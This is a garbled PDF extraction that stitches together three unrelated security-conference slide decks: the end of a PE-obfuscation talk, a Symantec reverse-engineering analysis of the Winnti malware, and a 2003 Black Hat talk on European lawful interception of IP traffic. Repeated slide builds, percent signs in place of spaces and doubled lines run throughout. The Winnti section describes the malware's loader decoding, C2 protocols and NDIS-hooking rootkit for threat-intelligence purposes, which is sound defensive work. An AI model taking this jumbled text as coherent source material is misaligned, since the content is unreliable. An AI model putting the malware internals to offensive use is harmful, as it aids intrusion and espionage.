New targets
Relocation Bonus - Wrap Up
65 / 67
Potential Improvements
More obfuscations
New targets
Multiple passes
Relocation Bonus - Wrap Up
65 / 67
Potential Improvements
More obfuscations
New targets
Multiple passes
Header Scrambling
Relocation Bonus - Wrap Up
65 / 67
Potential Improvements
More obfuscations
New targets
Multiple passes
Header Scrambling
Combining with runtime packers
Relocation Bonus - Wrap Up
65 / 67
Potential Improvements
More obfuscations
New targets
Multiple passes
Header Scrambling
Combining with runtime packers
Support for 64bit binaries
Relocation Bonus - Wrap Up
65 / 67
Potential Improvements
More obfuscations
New targets
Multiple passes
Header Scrambling
Combining with runtime packers
Support for 64bit binaries
Support for DLLs
Relocation Bonus - Wrap Up
65 / 67
Potential Improvements
More obfuscations
New targets
Multiple passes
Header Scrambling
Combining with runtime packers
Support for 64bit binaries
Support for DLLs
Selective obfuscations
Relocation Bonus - Wrap Up
65 / 67
THE END
66 / 67
Find Me
https://nickcano.com
https://github.com/nickcano
https://twitter.com/nickcano93
https://nostarch.com/gamehacking
https://pluralsight.com/authors/nick-cano
Source Code
https://github.com/nickcano/RelocBonus
https://github.com/nickcano/RelocBonusSlides
Resources
https://msdn.microsoft.com/en-us/library/ms809762.aspx
https://github.com/corkami/pocs/tree/master/PE
Relocation Bonus - Wrap Up
67 / 67 | pdf |
Winnti%Polymorphism%
Takahiro%Haruyama%
Symantec%
Who%am%I?%
• Takahiro%Haruyama%(@cci_forensics)%
• Reverse%Engineer%at%Symantec%
– Managed%Adversary%and%Threat%Intelligence%(MATI)%
• https://www.symantec.com/services/cyber-security-services/
deepsight-intelligence/adversary%
• Speaker%
– BlackHat%Briefings%USA/EU/Asia,%SANS%DFIR%Summit,%
CEIC,%DFRWS%EU,%SECURE,%FIRST,%RSA%Conference%JP,%
etc…%
2%
Motivation%
• Winnti%is%malware%used%by%Chinese%threat%actor%for%
cybercrime%and%cyber%espionage%since%2009%
• Kaspersky%and%Novetta%published%good%white%papers%
about%Winnti%[1]%[2]%
• Winnti%is%still%active%and%changing%
– Variants%whose%behavior%is%different%from%past%reports%
– Targets%except%game%and%pharmaceutical%industries%
• I’d%like%to%fill%the%gaps%
3%
Agenda%
• Winnti%Components%and%Binaries%
• Getting%Target%Information%from%Winnti%
Samples%
• Wrap-up%
4%
Winnti%Components%and%Binaries%
5%
Winnti%Execution%Flow%
%
6%
Dropper
Engine
2. run
3. load
& run
Service-
with-config
Worker-
with-config
(encrypted)
1. drop
5. load
memory-resident
or omitted
4. decrypt
& run
rootkit
drivers
C2-server
6. connect
to C2
New%Findings%
%
7%
Dropper
Engine
other,
malware,family
2. run
3. load
& run
Service,
with,config
Worker,
with,config
(encrypted)
1. drop
5. load
decrypt & run
(rare samples only)
memory-resident
or omitted
or file
client,malware?,on,
other,machines
4. decrypt
& run
rootkit
drivers
C2,server
6. connect
to C2
connected
through
covert
channel
SMTP
supported
Dropper%Component%
• extract%other%components%from%inline%DES-protected%blob%
– the%dropped%components%are%%
• service%and%worker%
• additionally%engine%with%other%malware%family%(but%that%is%rare)%
– the%password%is%passed%from%command%line%argument%
– Some%samples%add%dropper’s%configuration%into%the%overlays%of%the%
components%
• run%service%component%
– /rundll32.exe%"%s",%\w+%%s/%
– the%export%function%name%often%changes%
• Install,%DlgProc,%gzopen_r,%Init,%sql_init,%sqlite3_backup_deinit,%etc...%
8%
Service%Component%
• load%engine%component%from%inline%blob%
– the%values%in%PE%header%are%eliminated%
• e.g.,%MZ/PE%signatures,%machine%architecture,%
NumberOfRvaAndSizes,%etc...%
• call%engine’s%export%functions%%
– some%variants%use%the%API%hashes%
• e.g.,%0x0C148B03%=%"Install”,%0x3013465F%=%"DeleteF"%
9%
Engine%Component
• memory-resident%
– some%samples%are%saved%as%files%with%the%same%
encryption%of%worker%component%
• export%function%names%
– Install,%DeleteF,%and%Workmain%
• try%to%bypass%UAC%dialog%then%create%service%
• decrypt/run%worker%component%
– PE%header%values%eliminated,%1%byte%xor%&%nibble%swap%
10%
Worker%Component%
• export%function%names%
– work_start,%work_end%
• plugin%management%
– the%plugins%are%cached%on%disk%or%memory-resident%
• supported%C2%protocols%
– TCP%=%header%+%LZMA-compressed%payload%
– HTTP,%HTTPS%=%zlib-compressed%payload%as%POST%data%
– SMTP%
11%
SMTP%Worker%Component%
• Some%worker%components%support%SMTP%
– the%config%contains%email%addresses%and%more%obfuscated%
(incremental%xor%+%dword%xor)%
• Public%code%is%reused%
– The%old%code%looks%copied%from%PRC-based%Mandarin-language%
programming%and%code%sharing%forum%[3]%
• The%hard-coded%sender%email%and%password%are%"[email protected]"%and%
"test123456”%
– The%new%code%looks%similar%to%the%one%distributed%in%Code%Project%[4]%
• STARTTLS%is%newly%supported%to%encrypt%the%SMTP%traffic%
12%
SMTP%Worker%Component%(Cont.)%
for%decrypting%each%member%%
QQMail%[5]%account%is%used%%
for%sending%
recipient%email%addresses%
13%
VSEC%Variant%[6]
• Two%main%differences%compared%with%Novetta%variant%
[2]%
– no%engine%component%
• service%component%directly%calls%worker%component%%
– worker’s%export%function%name%is%“DllUnregisterServer”%
• takes%immediate%values%according%to%the%functions%
– e.g.,%0x201401%=%delete%file,%0x201402%=%dll/code%injection,%0x201404%=%
run%inline%main%DLL%
• recently%more%active%than%Novetta%variant?%
14%
VSEC%Variant%(Cont.)%
• unique%persistence%
– Some%samples%modify%IAT%
of%legitimate%windows%dlls%
to%load%service%component%
– the%target%dll%name%is%
included%in%the%
configuration%
• e.g.,%wbemcomn.dll,%
loadperf.dll%
worker%
infected%
Windows%dll%
service%
15%
Winnti%as%a%Loader%
• Some%engine%components%
embeds%other%malware%
family%like%Gh0st%and%
PlugX%
– the%configuration%is%
encrypted%by%Winnti%and%
the%malware%algorithm%
– the%config%members%are%
the%malware%specific%+%
Winnti%strings%
Winnti-related%members%
16%
Related%Kernel%Drivers%
• Kernel%rootkit%drivers%are%included%in%worker%
components%
– hiding%TCP%connections%
• The%same%driver%is%also%used%by%Derusbi%[7]%%
– making%covert%channels%with%other%client%machines%
• The%behavior%is%similar%to%WFP%callout%driver%of%Derusbi%
server%variant%[8]%but%the%implementation%is%different%
17%
Related%Kernel%Drivers%(Cont.)%
• The%rootkit%hooks%TCPIP%Network%Device%Interface%Specification%
(NDIS)%protocol%handlers%
– intercepts%incoming%TCP%packets%then%forward%to%worker%DLL%
Worker&DLL&
with&config
the&rootkit&driver
(DKOM&used,&names/paths&nullfied)
NDIS_OPEN_BLOCK
IRP_MJ_DEVICE_CONTROL
ReceiveNetBufferLists and
ProtSendNetBufferListsComplete
NDIS_PROTOCOL_BLOCK
BindAdapterHandlerEx and
NetPnPEventHandler
\\Device\\Null
Client
Malware&
(0) install hooks
(1) send
packet
(2) save TCP &
special format
packets
install hooks again
everytime net config
changes
packet
buffers
TCPIP protocol handlers
(3) read & write
to user buffer
dword 1
dword 2 dword 3
dword 4
dword2 !=0 && dword4 == (dword1 ^ dword3) << 0x10
The packet header
18%
Related%Attack%Tools%
•
bootkit%found%by%Kaspersky%when%tracking%Winnti%activity%[9]%
•
“skeleton%key”%to%%patch%on%a%victim's%AD%domain%controllers%[10]%
•
custom%password%dump%tool%(exe%or%dll)%
– Some%samples%are%protected%by%VMProtect%or%unique%xor%or%AES%
– the%same%API%hash%calculation%algorithm%used%(function%name%=%“main_exp”)%
•
PE%loader%
– decrypt%and%run%a%file%specified%by%the%command%line%argument%
• *((_BYTE%*)buf_for_cmdline_file%+%offset)%^=%7%*%offset%+%90;%
19%
Getting%Target%Information%from%
Winnti%Samples%
%from%Kaspersky%blog%[11]%
20%
Two%Sources%about%the%Targets%
• campaign%ID%from%configuration%data%
– target%organization/country%name%
• stolen%certificate%from%rootkit%drivers%
– already-compromised%target%name%
• I%checked%over%170%Winnti%samples%%
– Which%industry%is%targeted%by%the%actor,%except%game%
and%pharma%ones?%
21%
Extraction%Strategy%
•
regularly%collect%samples%from%VT/Symc%by%using%detection%name%or%yara%
rules%
•
try%to%crack%the%DES%password%if%the%sample%is%dropper%component%
– or%just%decrypt%the%config%if%possible%
•
run%config/worker%decoder%for%service/worker%components%
– campaign%IDs%are%included%in%worker%rather%than%service%
•
extract%drivers%from%worker%components%then%check%the%certificates%
•
exclude%the%following%information%
– not%identifiable%campaign%ID%(e.g.,%“a1031066”,%“taka1100”)%
– already-known%information%by%public%blogs/papers%
22%
Extraction%Strategy%(Cont.)%
• automation%
– config/worker%decoder%(stand-alone)%
• decrypt%config%data%and%worker%component%if%detected%
• additionally%decrypt%for%PlugX%loader%or%SMTP%worker%variants%%
– dropper%password%brute%force%script%(IDAPython%or%stand-alone)%
campaign%ID%
23%
Extraction%Strategy%(Cont.)%
• double-check%campaign%IDs%by%using%VT%submission%metadata%
– the%company%has%its%HQ%or%branch%office%in%the%submitted%country/
city?%
• e.g.,%the%ID%means%2%possible%companies%in%different%industries%
– The%submission%city%helps%to%identify%the%company%
VT%submission%metadata%
decrypted%config%
24%
Result%about%Campaign%ID%
• only%27%%%samples%contained%configs%!%
– Most%of%them%are%service%components%
• service%components%usually%contains%just%path%information%
– difficult%to%collect%dropper/worker%components%by%
detection%name%
• Yara%retro-hunt%can%search%samples%within%only%3%weeks%%
• 19%unique%campaign%IDs%found%
– 12%IDs%were%identifiable%and%not%open%
25%
Result%about%Campaign%ID%(Cont.)%
1st%seen%year%
from%VT%metadata%
submission%country%/%city%
from%VT%metadata%
Industry%%
2014%
Russia%/%Moscow%
Internet%Information%Provider?%(typo)%
2015%
China%/%Shenzhen%
University?%(not%sure)%
2015%
South%Korea%/%Seongnam-si% Game%
2015%
South%Korea%/%Seongnam-si% Game%
2015%
South%Korea%/%Seongnam-si% Game%
2016%
Japan%/%Chiyoda%
Chemicals%
2016%
Vietnam%/%Hanoi%
Internet%Information%Provider,%E-
commerce,%Game%
2016%
South%Korea%/%Seoul%
Investment%Management%Firm%
2016%
South%Korea%/%Seongnam-si% Anti-Virus%Software%
2016%
USA%/%Bellevue%
Game%
2016%
Australia%/%Adelaide%
IT,%Electronics%
2016%
USA%/%Milpitas%
Telecommunications%
26%
Result%about%Certificate%
• 12%unique%certificates%found%but%most%of%them%are%known%in%
[1]%[12]%
• 4%certificates%are%not%open%
– One%of%them%is%signed%by%an%electronics%company%in%Taiwan%
– The%others%are%certificates%of%chinese%companies%
• "Guangxi%Nanning%Shengtai'an%E-Business%Development%CO.LTD",%
"BEIJING%KUNLUN%ONLINE%NETWORK%TECH%CO.,LTD",%"优
传责"%
– I’m%not%sure%if%they%were%stolen%or%not%
• One%is%a%primary%distributor%of%unwanted%software?%[13]%
27%
Wrap-up%
%
%
28%
Wrap-up%
• Winnti%malware%is%polymorphic,%but%
– The%variants%and%tools%have%common%codes%
• e.g.,%config/binary%encryption,%API%hash%calculation%
– Some%driver%implementations%are%identical%or%similar%to%Derusbi’s%ones%
• Today%Winnti%threat%actor(s?)%targets%at%chemical,%e-commerce,%
investment%management%firm,%electronics%and%
telecommunications%companies%
– Game%companies%are%still%targeted%
• Symantec%telemetry%shows%they%are%just%a%little%bit%of%targets%!%
29%
Reference
1.
http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-than-just-a-
game-130410.pdf%
2.
https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf%
3.
http://blog.csdn.net/lishuhuakai/article/details/27852009%
4.
http://www.codeproject.com/Articles/28806/SMTP-Client%
5.
https://en.mail.qq.com/
6.
http://blog.vsec.com.vn/apt/initial-winnti-analysis-against-vietnam-game-company.html%
7.
https://assets.documentcloud.org/documents/2084641/crowdstrike-deep-panda-report.pdf%
8.
https://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf%
9.
https://securelist.com/analysis/publications/72275/i-am-hdroot-part-1/%
10.
https://www.symantec.com/connect/blogs/backdoorwinnti-attackers-have-skeleton-their-closet%
11.
https://securelist.com/blog/incidents/70991/games-are-over/%
12.
http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family%
13.
https://www.herdprotect.com/signer-guangxi-nanning-shengtaian-e-business-development-
coltd-1eb0f4d821e239ba81b3d10e61b7615b.aspx
30% | pdf |
Lawful Interception of IP
Lawful Interception of IP
Traffic:
Traffic:
The European Context
The European Context
Jaya Baloo
Jaya Baloo
BLACKHAT
BLACKHAT
July 30, 2003
July 30, 2003
Las Vegas, Nevada
Las Vegas, Nevada
Contents
Contents
Introduction to Lawful Interception
Introduction to Lawful Interception
Interception of Internet services
Interception of Internet services
Origins in The European Community
Origins in The European Community
The European Interception Legislation in Brief
The European Interception Legislation in Brief
ETSI
ETSI
The Dutch TIIT specifications
The Dutch TIIT specifications
Interception Suppliers & Discussion of Techniques
Interception Suppliers & Discussion of Techniques
Future Developments & Issues
Future Developments & Issues
Introduction to Lawful Interception
Introduction to Lawful Interception
ETSI definition of (lawful) interception:
ETSI definition of (lawful) interception:
interception:
interception: action (based on the law),
action (based on the law),
performed
performed by an network operator/access
by an network operator/access
provider/service provider (NWO/AP/SvP), of
provider/service provider (NWO/AP/SvP), of
making available certain information and
making available certain information and
providing that information to a law enforcement
providing that information to a law enforcement
monitoring facility.
monitoring facility.
Network Operator,
Access Provider or
Service Provider
Law
Enforcement
Agency
(LEA)
Law
Enforcement
Monitoring
Facility
LI
order
Deliver requested
information
LI
LI’’s Raison D
s Raison D’’etre
etre
Why intercept?
Why intercept?
Terrorism
Terrorism
Pedophilia rings
Pedophilia rings
Cyber stalking
Cyber stalking
Data theft
Data theft ––Industrial espionage
Industrial espionage
Drug dealers on the internet
Drug dealers on the internet
Why not?
Why not?
Privacy
Privacy
Security
Security
Legal Issues in LI
Legal Issues in LI
Judge: "Am I not to hear the truth?"
Judge: "Am I not to hear the truth?"
Objecting Counsel: "No, Your Lordship is to hear the
Objecting Counsel: "No, Your Lordship is to hear the
evidence."
evidence."
Some characteristics of evidence- relevance to LI
Some characteristics of evidence- relevance to LI
Admissible
Admissible –– can evidence be considered in court
can evidence be considered in court––
*differs per country
*differs per country
Authentic
Authentic –– explicitly link data to individuals
explicitly link data to individuals
Accurate
Accurate –– reliability of surveillance process over
reliability of surveillance process over
content of intercept
content of intercept
Complete
Complete –– tells a
tells a ““complete
complete”” story of a particular
story of a particular
circumstance
circumstance
Convincing to juries
Convincing to juries –– probative value, and subjective
probative value, and subjective
practical test of presentation
practical test of presentation
Admissibility of Surveillance
Admissibility of Surveillance
Evidence
Evidence
Virtual Locus Delecti
Virtual Locus Delecti
Hard to actually find criminals in delicto flagrante
Hard to actually find criminals in delicto flagrante
How to handle expert evidence? Juries are not
How to handle expert evidence? Juries are not
composed of network specialists. Legal not scientific
composed of network specialists. Legal not scientific
decision making.
decision making.
Case for treating Intercepted evidence as secondary and
Case for treating Intercepted evidence as secondary and
not primary evidence
not primary evidence
Primary
Primary –– is the best possible evidence
is the best possible evidence –– e.g. in the
e.g. in the
case of a document
case of a document –– its original.
its original.
Secondary
Secondary –– is clearly not the primary source
is clearly not the primary source –– e.g.
e.g.
in the case of a document
in the case of a document –– a copy.
a copy.
Interception of Internet services
Interception of Internet services
Interception of Internet services
Interception of Internet services
What are defined as Internet services?
What are defined as Internet services?
access to the Internet
access to the Internet
the services that go over the Internet, such as:
the services that go over the Internet, such as:
surfing the World Wide Web (e.g. html),
surfing the World Wide Web (e.g. html),
e-mail,
e-mail,
chat and icq,
chat and icq,
VoIP, FoIP
VoIP, FoIP
ftp,
ftp,
telnet
telnet
What about encrypted traffic?
What about encrypted traffic?
Secure e-mail (e.g. PGP, S/MIME)
Secure e-mail (e.g. PGP, S/MIME)
Secure surfing with HTTPS (e.g. SSL, TLS)
Secure surfing with HTTPS (e.g. SSL, TLS)
VPNs (e.g. IPSec)
VPNs (e.g. IPSec)
Encrypted IP Telephony (e.g. pgp -phone and
Encrypted IP Telephony (e.g. pgp -phone and
Nautilus)
Nautilus)
etc.
etc.
If applied by NWO/AP/SvP then
If applied by NWO/AP/SvP then
encryption should be stripped before sending to
encryption should be stripped before sending to
LEMF or
LEMF or
key(s) should be made available to LEA
key(s) should be made available to LEA
else
else
a challenge for the LEA
a challenge for the LEA
Logical Overview
Logical Overview
Technical Challenges
Technical Challenges
Req.
Req. ––Maintain Transparency & Standard of
Maintain Transparency & Standard of
Communication
Communication
Identify Target - Monitoring Radius
Identify Target - Monitoring Radius –– misses
misses
disconnect
disconnect
Capture Intercept information
Capture Intercept information –– Effective
Effective
Filtering Switch
Filtering Switch
Packet Reassembly
Packet Reassembly
Software complexity increases bugginess
Software complexity increases bugginess
Peering with LEMF
Peering with LEMF
Origins in The European
Origins in The European
Community
Community
What is LI based on in the EU?
What is LI based on in the EU?
Legal Basis
Legal Basis
EU directive
EU directive
Convention on Cybercrime
Convention on Cybercrime –– Council of Europe-
Council of Europe-
Article 20- Real time collection of traffic data
Article 20- Real time collection of traffic data
Article 21- Interception of content data
Article 21- Interception of content data
National laws & regulations
National laws & regulations
Technically
Technically
Not
Not Carnivore
Carnivore
Not
Not Calea
Calea
Standards, Best Practices based approach
Standards, Best Practices based approach
IETF
IETF’’s standpoint (RFC 2804 IETF Policy on
s standpoint (RFC 2804 IETF Policy on
Wiretapping )
Wiretapping )
The European Interception
The European Interception
Legislation in Brief
Legislation in Brief
Solution Requirements
Solution Requirements
European Interception Legislation
European Interception Legislation
France
France
Commission Nationale de Contr
Commission Nationale de Contrôôle des
le des
Interceptions de S
Interceptions de Séécurit
curitéé -- La loi 91-636
-- La loi 91-636
Loi sur la Securite Quotidienne
Loi sur la Securite Quotidienne –– November
November
2001
2001
Germany
Germany
G-10
G-10 –– 2001-
2001- ””Gesetz zur Beschr
Gesetz zur Beschräänkung des
nkung des
Brief-, Post- und Fernmeldegeheimnisses
Brief-, Post- und Fernmeldegeheimnisses””
The Counter terrorism Act
The Counter terrorism Act –– January 2002
January 2002
UK Interception Legislation
UK Interception Legislation
UK
UK
Regulation of Investigatory Powers Act 2000
Regulation of Investigatory Powers Act 2000
Anti-terrorism, Crime and Security Act 2001
Anti-terrorism, Crime and Security Act 2001
““The tragic events in the United States on 11 September 2001
The tragic events in the United States on 11 September 2001
underline the importance of the Service
underline the importance of the Service’’s work on national security
s work on national security
and, in particular, counter-terrorism. Those terrible events
and, in particular, counter-terrorism. Those terrible events
significantly raised the stakes in what was a prime area of the
significantly raised the stakes in what was a prime area of the
Service
Service’’s work. It is of the utmost importance that our Security Service
s work. It is of the utmost importance that our Security Service
is able to maintain its capability against this very real threat, both in
is able to maintain its capability against this very real threat, both in
terms of staff and in terms of other resources. Part of that falls to
terms of staff and in terms of other resources. Part of that falls to
legislation and since this website was last updated we have seen the
legislation and since this website was last updated we have seen the
advent of the Regulation of Investigatory Powers Act 2000, Terrorism
advent of the Regulation of Investigatory Powers Act 2000, Terrorism
Act 2000 and the Anti-Terrorism Crime and Security Act 2001. Taken
Act 2000 and the Anti-Terrorism Crime and Security Act 2001. Taken
together these Acts provide the Security Service, amongst others, with
together these Acts provide the Security Service, amongst others, with
preventative and investigative capabilities, relevant to the technology
preventative and investigative capabilities, relevant to the technology
of today and matched to the threat from those who would seek to
of today and matched to the threat from those who would seek to
harm or undermine our society.
harm or undermine our society. ““ –– The UK Home Secretary
The UK Home Secretary’’ss
Foreword on www.MI5.gov
Foreword on www.MI5.gov
The Case in Holland
The Case in Holland
At the forefront of LI : both legally & technically
At the forefront of LI : both legally & technically
The Dutch Telecommunications Act 1998
The Dutch Telecommunications Act 1998–– Operator Responsibilities
Operator Responsibilities
The Dutch Code of Criminal Proceedings
The Dutch Code of Criminal Proceedings –– Initiation and handling of
Initiation and handling of
interception request
interception request
The Special Investigation Powers Act -streamlines criminal
The Special Investigation Powers Act -streamlines criminal
investigation methods
investigation methods
WETVOORSTEL 20859
WETVOORSTEL 20859 –– backdoor decree to start fishing
backdoor decree to start fishing
expeditions for NAW info
expeditions for NAW info –– Provider to supply info not normally
Provider to supply info not normally
available
available
LIO
LIO –– National Interception Office
National Interception Office –– in operation since end of 2002
in operation since end of 2002
CIOT
CIOT –– central bureau for interception for telecom
central bureau for interception for telecom
European Telecommunications
European Telecommunications
Standards Institute
Standards Institute
Technical Specs. of Lawful
Technical Specs. of Lawful
Interception The ETSI model
Interception The ETSI model
NWO/AP/SvP’s
administration
function
IRI mediation
function
CC mediation
function
Network
Internal
Functions
IIF
INI
intercept related
information (IRI)
content of
communication (CC)
LI handover interface HI
HI1
HI2
HI3
LEMF
LEA
domain
NOW / AP / SvP‘s domain
IIF: internal interception function
INI: internal network interface
HI1: administrative information
HI2: intercept related information
HI3: content of communication
ETSI
ETSI
Purpose of ETSI LI standardization
Purpose of ETSI LI standardization –– ““to facilitate the economic
to facilitate the economic
realization of lawful interception that complies with the national and
realization of lawful interception that complies with the national and
international conventions and legislation
international conventions and legislation ““
Enable Interoperability
Enable Interoperability –– Focuses on Handover Protocol
Focuses on Handover Protocol
Formerly ETSI TC SEC LI
Formerly ETSI TC SEC LI –– working group
working group
Now ETSI TC LI
Now ETSI TC LI ––separate committee standards docs.
separate committee standards docs.
Handover Spec
Handover Spec –– IP
IP –– expected in 2003-04-01 WI 0030-20
expected in 2003-04-01 WI 0030-20
DTS/LI-00005
DTS/LI-00005 –– Service specific details for internet access
Service specific details for internet access ––
RADIUS DHCP
RADIUS DHCP –– etc. how to intercept internet access services
etc. how to intercept internet access services ––
payload
payload
DTS/LI-00004
DTS/LI-00004 –– Email specific
Email specific
Extras VOIP PPP tunneling
Extras VOIP PPP tunneling –– proposals
proposals
IPV6 - integrate in 0005 ?
IPV6 - integrate in 0005 ?
Current Status : still in progress
Current Status : still in progress
Comprised primarily of operators and vendors - WG LI
Comprised primarily of operators and vendors - WG LI
ETSI TR 101 944
ETSI TR 101 944 –– The Issues
The Issues
ETSI TR 101 944
ETSI TR 101 944
Responsibility- Lawful Interception requirements
Responsibility- Lawful Interception requirements
must be addressed separately to Access Provider
must be addressed separately to Access Provider
and Service Provider.
and Service Provider.
5 layer model - Network Level & Service Level
5 layer model - Network Level & Service Level
division
division
Implementation Architecture
Implementation Architecture ––
Telephone cct. (PSTN/ISDN)
Telephone cct. (PSTN/ISDN)
Digital Subscriber Line (xDSL)
Digital Subscriber Line (xDSL)
Local Area Network (LAN)
Local Area Network (LAN)
Permanent IP Address
Permanent IP Address
Security Aspects
Security Aspects
HI3 Delivery
HI3 Delivery
The Dutch TIIT specifications
The Dutch TIIT specifications
The TIIT
The TIIT
WGLI
WGLI
The Players
The Players
The End Result V.1.0
The End Result V.1.0
The deadlines
The deadlines –– Full IP & Email
Full IP & Email ––2002
2002
NLIP
NLIP
Costs
Costs
ISP Challenge
ISP Challenge
TIIT
TIIT
User (LEA) Requirements for transport
User (LEA) Requirements for transport
Description of Handover Interface
Description of Handover Interface
HI1: method depends on LEA, but also contains crypto keys
HI1: method depends on LEA, but also contains crypto keys
HI2: events like login, logout, access e-mailbox, etc.
HI2: events like login, logout, access e-mailbox, etc.
HI3: Content of Communication and
HI3: Content of Communication and
additional generated information (hash results and NULL packets)
additional generated information (hash results and NULL packets)
Description of General Architecture for HI2 and HI3
Description of General Architecture for HI2 and HI3
Handover Interface specification
Handover Interface specification
Global data structures
Global data structures
S1
S1 –– T2 Traffic Definition
T2 Traffic Definition
Data structures and message flows for HI2 and HI3
Data structures and message flows for HI2 and HI3
Use of cryptography
Use of cryptography
TIIT
TIIT
General Architecture for HI2 and HI3
General Architecture for HI2 and HI3
S1
interception
S2
gathering &
transport
S1
interception
S1
interception
S3
management
box
Mediation Function
Internet
Law Enforcement Monitoring Facility (LEMF)
T1
T1
T1
HI2 &
HI3
Law
Enforcement
Agency (LEA)
LI
order
LI Warrant
Admin Desk
ISP
HI1
T2
(LEA1)
T2
(LEA2)
S1
interception
S2
gathering &
transport
S1
interception
S1
interception
S3
management
box
T2
(LEA1)
Mediation Function
Internet
Law Enforcement Monitoring Facility (LEMF)
T1
T1
T1
HI2 &
HI3
S1
S1::
Intercept target traffic
Intercept target traffic
Time stamp target packets
Time stamp target packets
Generate SHA hash over 64 target
Generate SHA hash over 64 target
packets
packets
Encrypt with key specific for this
Encrypt with key specific for this
interception
interception
Send to S2
Send to S2
T2
(LEA2)
TIIT
TIIT
General Architecture for HI2 and HI3
General Architecture for HI2 and HI3
S2:
•Collect target packets from
authenticated S1s
•Distribute target packet randomly
over the T1s over a TLS or IPsec
channel
•Use X.509 certificates for mutual
authentication
TIIT - General Architecture for HI2
TIIT - General Architecture for HI2
and HI3
and HI3
S1
interception
S2
gathering &
transport
S1
interception
S1
interception
S3
management
box
Mediation Function
Internet
Law Enforcement Monitoring Facility (LEMF)
T1
T1
T1
HI2 &
HI3
S3 is not really TIIT
S3 is not really TIIT
Management system for
Management system for
Starting & stopping interceptions
Starting & stopping interceptions
Collect billing data
Collect billing data
Etc.
Etc.
T2
(LEA1)
T2
(LEA2)
TIIT - General Architecture for HI2
TIIT - General Architecture for HI2
and HI3
and HI3
S1
interception
S2
gathering &
transport
S1
interception
S1
interception
S3
management
box
Mediation Function
Internet
Law Enforcement Monitoring Facility (LEMF)
T1
T1
T1
HI2 &
HI3
T2
(LEA1)
T2
(LEA2)
T2:
T2:
Decrypt packets from
Decrypt packets from
S1s
S1s
Check integrity
Check integrity
T1s:
T1s:
End TLS or IPsec
End TLS or IPsec
channel(s)
channel(s)
Forward data to T2(s) of
Forward data to T2(s) of
the LEA that ordered
the LEA that ordered
the interception
the interception
Interception Suppliers &
Interception Suppliers &
Discussion of Techniques
Discussion of Techniques
LI Implementations
LI Implementations
Verint formerly known as Comverse Infosys
Verint formerly known as Comverse Infosys
ADC formerly known as SS8
ADC formerly known as SS8
Accuris
Accuris
Pine
Pine
Nice
Nice
Aqsacom
Aqsacom
Digivox
Digivox
Telco/ ISP hardware vendors
Telco/ ISP hardware vendors
Siemens
Siemens
Alcatel
Alcatel
Cisco
Cisco
Nortel
Nortel
Implementation techniques
Implementation techniques
Active- direct local interception
Active- direct local interception –– i.e. Bcc:
i.e. Bcc:
Semi-Active- interaction with Radius to
Semi-Active- interaction with Radius to
capture and filter traffic per IP address
capture and filter traffic per IP address
Passive- no interaction with ISP required
Passive- no interaction with ISP required
only interception point for LEA device
only interception point for LEA device
Most of the following are active or a
Most of the following are active or a
combination of active and semi-active
combination of active and semi-active
implementations
implementations
Verint = Comverse - Infosys
Verint = Comverse - Infosys
Based in Israel
Based in Israel –– Re : Phrack 58-13
Re : Phrack 58-13
Used by Dutch LEMF
Used by Dutch LEMF
Used extensively internationally
Used extensively internationally –– supports
supports
CALEA & ETSI
CALEA & ETSI
Use of Top Layer switch
Use of Top Layer switch
Response
Response
NICE
NICE
Used in BE as t1
Used in BE as t1
Proprietary
Proprietary –– implemented for ETSI
implemented for ETSI
Feat., topic extraction, Keyword Spotting,
Feat., topic extraction, Keyword Spotting,
Remote Send of CC
Remote Send of CC
Auto Lang. detection and translation
Auto Lang. detection and translation
Runs on Windows NT &2000 Svr.
Runs on Windows NT &2000 Svr.
Stand alone internet/ telephony solution
Stand alone internet/ telephony solution
ADC = SS8
ADC = SS8
Use of proprietary hardware
Use of proprietary hardware
Used for large bandwidth ccts.
Used for large bandwidth ccts.
Known to be used in Satellite Traffic
Known to be used in Satellite Traffic
centers
centers
Supports CALEA
Supports CALEA –– ETSI
ETSI
Use of Top Layer switch
Use of Top Layer switch
Accuris
Accuris
Max. of 50 concurrent taps
Max. of 50 concurrent taps
Solution not dependant on switch type
Solution not dependant on switch type
Can use single s2 as concentrator
Can use single s2 as concentrator
Offer Gigabit Solution
Offer Gigabit Solution –– but depends on
but depends on
selected switch capability and integration
selected switch capability and integration
with filter setting
with filter setting
Supports Calea & ETSI
Supports Calea & ETSI
ItIt’’s all about the M$ney
s all about the M$ney
Solutions can cost anywhere from 100,000 Euro to
Solutions can cost anywhere from 100,000 Euro to
700,000 Euro for the ISP
700,000 Euro for the ISP
UK Govt. expected to spend 46 billion over the next 5
UK Govt. expected to spend 46 billion over the next 5
years- subsequently reduced to 27 billion
years- subsequently reduced to 27 billion
Division of costs
Division of costs
Cap Ex = ISP
Cap Ex = ISP
Op Ex = Govt.
Op Ex = Govt.
Penalties for non-compliance
Penalties for non-compliance
Fines
Fines –– up to 250,000 euros
up to 250,000 euros
Civil Charges
Civil Charges
House Arrest of CEO of ISP
House Arrest of CEO of ISP
Cooperation between ISPs to choose single LI tool
Cooperation between ISPs to choose single LI tool
Conclusions for Law Enforcement
Conclusions for Law Enforcement
““If you
If you’’re going to do it
re going to do it …
… do it right
do it right””
Disclosure of tools and methods
Disclosure of tools and methods
Adherence to warrant submission requirements
Adherence to warrant submission requirements
Completeness of logs and supporting info.
Completeness of logs and supporting info.
Proof of non- contamination of target data
Proof of non- contamination of target data
Maintaining relationship with the private sector
Maintaining relationship with the private sector
Law Enforcement personnel
Law Enforcement personnel
Training
Training
Defining role of police investigators
Defining role of police investigators
Defining role of civilian technicians
Defining role of civilian technicians
Handling Multi
Handling Multi –– Focal investigations
Focal investigations
Future Developments & Issues
Future Developments & Issues
EU Expansion
EU Expansion –– Europol stipulations
Europol stipulations
Data Retention Decisions
Data Retention Decisions
ENFOPOL organization
ENFOPOL organization
Borderless LI
Borderless LI
ISP Role
ISP Role
EU wide agreements on Intercept Initiation
EU wide agreements on Intercept Initiation
Quantum Cryptography
Quantum Cryptography
WLAN challenges
WLAN challenges
The Future of Privacy Legislation ?
The Future of Privacy Legislation ?
Web Sites
Web Sites
www.opentap.org
www.opentap.org
http://www.quintessenz.at/cgi-
http://www.quintessenz.at/cgi-
bin/index?funktion=doquments
bin/index?funktion=doquments
www.phrack.com
www.phrack.com
www.cryptome.org
www.cryptome.org
www.statewatch.org
www.statewatch.org
www.privacy.org
www.privacy.org
www.iwar.org.uk
www.iwar.org.uk
www.cipherwar.com
